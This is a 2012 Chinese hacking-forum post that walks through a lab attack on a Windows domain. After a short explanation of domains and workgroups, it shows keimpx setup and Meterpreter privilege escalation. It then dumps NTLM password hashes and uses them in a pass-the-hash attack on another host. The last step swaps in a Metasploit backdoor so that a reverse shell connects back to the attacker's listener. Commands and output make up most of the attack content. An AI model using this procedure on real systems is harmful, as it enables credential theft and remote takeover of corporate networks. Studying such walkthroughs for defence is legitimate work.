切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
149 域入侵 HASH注入 keimpx[复制链接]
发表于 2012-9-11 00:50:47 | 显示全部楼层 |!read_mode!
2003 域管理 1.1.1.10
win2 1 1.1.1.6
win2 2 1.1.1.7
  1. apt-get install mingw32
复制代码
有150M之巨

关于域

如果企业网络中计算机和用户数量较多时,要实现高效管理,就需要windows域。

域和组的区别

工作组是一群计算机的集合,它仅仅是一个逻辑的集合,各自计算机还是各自管理的,你要访问其中的计算机,还是要到被访问计算机上来实现用户验证的。而域不同,域是一个有安全边界的计算机集合,在同一个域中的计算机彼此之间已经建立了信任关系,在域内访问其他机器,不再需要被访问机器的许可了。为什么是这样的呢?因为在加入域的时候,管理员为每个计算机在域中(可和用户不在同一域中)建立了一个计算机帐户,这个帐户和用户帐户一样,也有密码保护的。可是大家要问了,我没有输入过什么密码啊,是的,你确实没有输入,计算机帐户的密码不叫密码,在域中称为登录票据,它是由2000的DC(域控制器)上的KDC服务来颁发和维护的。为了保证系统的安全,KDC服务每30天会自动更新一次所有的票据,并把上次使用的票据记录下来。周而复始。也就是说服务器始终保存着2个票据,其有效时间是60天,60天后,上次使用的票据就会被系统丢弃。如果你的GHOST备份里带有的票据是60天的,那么该计算机将不能被KDC服务验证,从而系统将禁止在这个计算机上的任何访问请求(包括登录),解决的方法呢,简单的方法使将计算机脱离域并重新加入,KDC服务会重新设置这一票据。或者使用2000资源包里的NETDOM命令强制重新设置安全票据。因此在有域的环境下,请尽量不要在计算机加入域后使用GHOST备份系统分区,如果作了,请在恢复时确认备份是在60天内作的,如果超出,就最好联系你的系统管理员,你可以需要管理员重新设置计算机安全票据,否则你将不能登录域环境。
域和工作组适用的环境不同,域一般是用在比较大的网络里,工作组则较小,在一个域中需要一台类似服务器的计算机,叫域控服务器,其他电脑如果想互相访问首先都是经过它的,但是工作组则不同,在一个工作组里的所有计算机都是对等的,也就是没有服务器和客户机之分的,但是和域一样,如果一台计算机想访问其他算机的话首先也要找到这个组中的一台类似组控服务器,组控服务器不是固定的,以选举的方式实现,它存储这这个组的相关信息,找到这台计算机后得到组的信息然后访问。

关于keimpx

keimpx是一个内网杀手,是国际大黑客sqlmap作者bernardodamele写的

安装keimpx
  1. root@Dis9Team:~# cd /pen/
  2. root@Dis9Team:/pen# mkdir smb
  3. root@Dis9Team:/pen# cd smb/
  4. root@Dis9Team:/pen/smb# wget http://keimpx.googlecode.com/files/keimpx-0.2.zip
  5. root@Dis9Team:/pen/smb# unzip keimpx-0.2.zip
  6. Archive:  keimpx-0.2.zip
  7.    creating: keimpx-0.2/
  8.   inflating: keimpx-0.2/keimpx.py   
  9.    creating: keimpx-0.2/contrib/
  10.   inflating: keimpx-0.2/contrib/Makefile  
  11.   inflating: keimpx-0.2/contrib/srv_bindshell.exe  
  12.   inflating: keimpx-0.2/contrib/srv_bindshell.c  
  13.   inflating: keimpx-0.2/setup.py     
  14. root@Dis9Team:/pen/smb# cd keimpx-0.2
  15. root@Dis9Team:/pen/smb/keimpx-0.2# apt-get install cx-freeze
  16. root@Dis9Team:/pen/smb/keimpx-0.2# cxfreeze setup.py
  17. root@Dis9Team:/pen/smb/keimpx-0.2# apt-get install python-impacket python-impacket-doc python-pcapy
  18. root@Dis9Team:/pen/smb/keimpx-0.2# python2.6 keimpx.py -h
  19. This product includes software developed by CORE Security Technologies
  20. (http://www.coresecurity.com), Python Impacket library

  21.     keimpx 0.2
  22.     by Bernardo Damele A. G.

  23. Usage: keimpx.py [options]

  24. Options:
  25.   --version       show program's version number and exit
  26.   -h, --help      show this help message and exit
  27.   -v VERBOSE      Verbosity level: 0-2 (default 0)
  28.   -t TARGET       Target address
  29.   -l LIST         File with list of targets
  30.   -U USER         User
  31.   -P PASSWORD     Password
  32.   --nt=NTHASH     NT hash
  33.   --lm=LMHASH     LM hash
  34.   -c CREDSFILE    File with list of credentials
  35.   -D DOMAIN       Domain
  36.   -d DOMAINSFILE  File with list of domains
  37.   -p PORT         SMB port: 139 or 445 (default 445)
  38.   -n NAME         Local hostname
  39.   -T THREADS      Maximum simultaneous connections (default 10)
  40.   -b              Batch mode: do not ask to get an interactive SMB shell
  41. root@Dis9Team:/pen/smb/keimpx-0.2#
复制代码
取得权限

我们拿到了WIN2 2的权限

  1. meterpreter > getuid
  2. Server username: DIS9TEAM-V2\brk
  3. meterpreter > getsystem
  4. ...got system (via technique 1).
  5. meterpreter >
复制代码
当前用户是brk,我们可以查看一下详细信息

  1. meterpreter > run post/windows/gather/enum_domain

  2. [+] FOUND Domain: dis9
  3. [+] FOUND Domain Controller: dis9team-Domain (IP: 1.1.1.10)
  4. meterpreter >
复制代码
Domain是DIS9,域管理的IP是1.1.1.10
我们具体查看一下:

  1. meterpreter > shell
  2. Process 1768 created.
  3. Channel 1 created.
  4. Microsoft Windows XP [�汾 5.1.2600]
  5. (C) ��Ȩ���� 1985-2001 Microsoft Corp.

  6. C:\Documents and Settings\brk>net view
  7. net view
  8. ����������            ע�

  9. -------------------------------------------------------------------------------
  10. \\DIS9TEAM-DOMAIN      DIS9-Domain                                             
  11. \\DIS9TEAM-V2                                                                  
  12. \\DIS9TEAM-WEB                                                                 
  13. �����ɹ����ɡ�

  14. C:\Documents and Settings\brk>
复制代码
有3台机子
发现administrator是域管理用户


用户名                 Administrator全名注释                   管理计算机(域)的内置帐户用户的注释国家(地区)代码         000 (系统默认值)帐户启用               Yes帐户到期               从不

先获得HASH
  1. meterpreter > ps

  2. Process List
  3. ============

  4. PID   PPID  Name              Arch  Session     User                 Path
  5. ---   ----  ----              ----  -------     ----                 ----
  6. 0     0     [System Process]        4294967295                       
  7. 4     0     System            x86   0                                
  8. 372   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
  9. 520   372   csrss.exe         x86   0           NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
  10. 544   372   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
  11. 640   1016  cmd.exe           x86   0           DIS9TEAM-V2\brk      C:\WINDOWS\system32\cmd.exe
  12. 656   544   services.exe      x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
  13. 668   544   lsass.exe         x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
  14. 828   656   VBoxService.exe   x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\VBoxService.exe
  15. 872   656   svchost.exe       x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
  16. 956   656   svchost.exe       x86   0                                C:\WINDOWS\system32\svchost.exe
  17. 1048  656   svchost.exe       x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
  18. 1108  656   svchost.exe       x86   0                                C:\WINDOWS\system32\svchost.exe
  19. 1144  656   svchost.exe       x86   0                                C:\WINDOWS\system32\svchost.exe
  20. 1172  656   alg.exe           x86   0                                C:\WINDOWS\System32\alg.exe
  21. 1288  1516  cmd.exe           x86   0           DIS9TEAM-V2\brk      C:\WINDOWS\system32\cmd.exe
  22. 1420  1432  conime.exe        x86   0           DIS9TEAM-V2\brk      C:\WINDOWS\system32\conime.exe
  23. 1516  1488  explorer.exe      x86   0           DIS9TEAM-V2\brk      C:\WINDOWS\Explorer.EXE
  24. 1556  656   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
  25. 1612  1516  door.exe          x86   0           DIS9TEAM-V2\brk      $U$C:\Documents and Settings\brk\\door.exe-0x433a5c446f63756d656e747320616e642053657474696e67735c62726b5cd7c0c3e65c646f6f722e657865
  26. 1676  1516  VBoxTray.exe      x86   0           DIS9TEAM-V2\brk      C:\WINDOWS\system32\VBoxTray.exe
  27. 1692  1516  jusched.exe       x86   0           DIS9TEAM-V2\brk      C:\Program Files\Common Files\Java\Java Update\jusched.exe
  28. 1720  1516  ctfmon.exe        x86   0           DIS9TEAM-V2\brk      C:\WINDOWS\system32\ctfmon.exe
  29. 2000  656   jqs.exe           x86   0           NT AUTHORITY\SYSTEM  C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jqs.exe

  30. meterpreter > migrate 2000
  31. [*] Migrating to 2000...
  32. [*] Migration completed successfully.
  33. meterpreter > hashdump
  34. 123456:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  35. Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  36. brk:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  37. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  38. HelpAssistant:1000:198637c481956d26764ca5b909854cfc:fd119afad3d4fd346550b862a9171f09:::
  39. SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:842e5689e6a7ea73811a50b4b5b88933:::
  40. meterpreter >
复制代码
吧hash保存到文件中
  1. root@Dis9Team:/var/www# cat /tmp/hash
  2. 123456:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  3. Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  4. brk:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  5. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  6. HelpAssistant:1000:198637c481956d26764ca5b909854cfc:fd119afad3d4fd346550b862a9171f09:::
  7. SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:842e5689e6a7ea73811a50b4b5b88933:::

  8. root@Dis9Team:/var/www#
复制代码
HASH注入

换个 寻找个新主机

  1. msf  exploit(handler) > sessions -i 2
  2. meterpreter > shell
  3. Process 1240 created.
  4. Channel 1 created.
  5. Microsoft Windows XP [�汾 5.1.2600]
  6. (C) ��Ȩ���� 1985-2001 Microsoft Corp.
  7. [*] Starting interaction with 2...

  8. C:\WINDOWS\system32>net view
  9. net view
  10. ����������            ע�

  11. -------------------------------------------------------------------------------
  12. \\DIS9TEAM-DOMAIN      DIS9-Domain                                             
  13. \\DIS9TEAM-V2                                                                  
  14. \\DIS9TEAM-WEB                                                                 
  15. �����ɹ����ɡ�

  16. C:\WINDOWS\system32>ping DIS9TEAM-WEB
  17. ping DIS9TEAM-V2

  18. Pinging DIS9TEAM-WEB.dis9.local [1.1.1.7] with 32 bytes of data:
复制代码
1.1.1.7

  1. root@Dis9Team:/pen/smb/keimpx-0.2# python2.6 ./keimpx.py -t 1.1.1.7 -c /tmp/hash -v 1
复制代码
当获得SHELL的时候出错了


我们吧keimpx的DOOR换成MSF的DOOR,先用MSF生成一个DOOR保存到/var/www/door.exe 并监听


  1. root@Dis9Team:/pen/smb/keimpx-0.2# cd contrib/
  2. root@Dis9Team:/pen/smb/keimpx-0.2/contrib# ls
  3. Makefile  srv_bindshell.c  srv_bindshell.exe
  4. root@Dis9Team:/pen/smb/keimpx-0.2/contrib# mv srv_bindshell.exe srv_bindshell.exe.b
  5. root@Dis9Team:/pen/smb/keimpx-0.2/contrib# cp /var/www/door.exe srv_bindshell.exe
  6. root@Dis9Team:/pen/smb/keimpx-0.2/contrib#
复制代码
再次获得SHELL

  1. # shell
  2. [11:52:10] [INFO] Uploading the service executable to 'ADMIN$\dovvvk.exe'
  3. [11:52:10] [INFO] Connecting to the SVCCTL named pipe
  4. [11:52:10] [INFO] Creating the service 'qlkUfu'
  5. [11:52:10] [INFO] Starting the service 'qlkUfu'
复制代码
METASPLOIT有会话了


  1. meterpreter > background
  2. [*] Backgrounding session 2...
  3. msf  exploit(handler) > exploit

  4. [*] Started reverse handler on 1.1.1.3:4444
  5. [*] Starting the payload handler...
  6. [*] Sending stage (752128 bytes) to 1.1.1.7
  7. [*] Meterpreter session 4 opened (1.1.1.3:4444 -> 1.1.1.7:1096) at 2012-06-26 11:52:11 -0700

  8. meterpreter >
复制代码



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-23 14:56

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部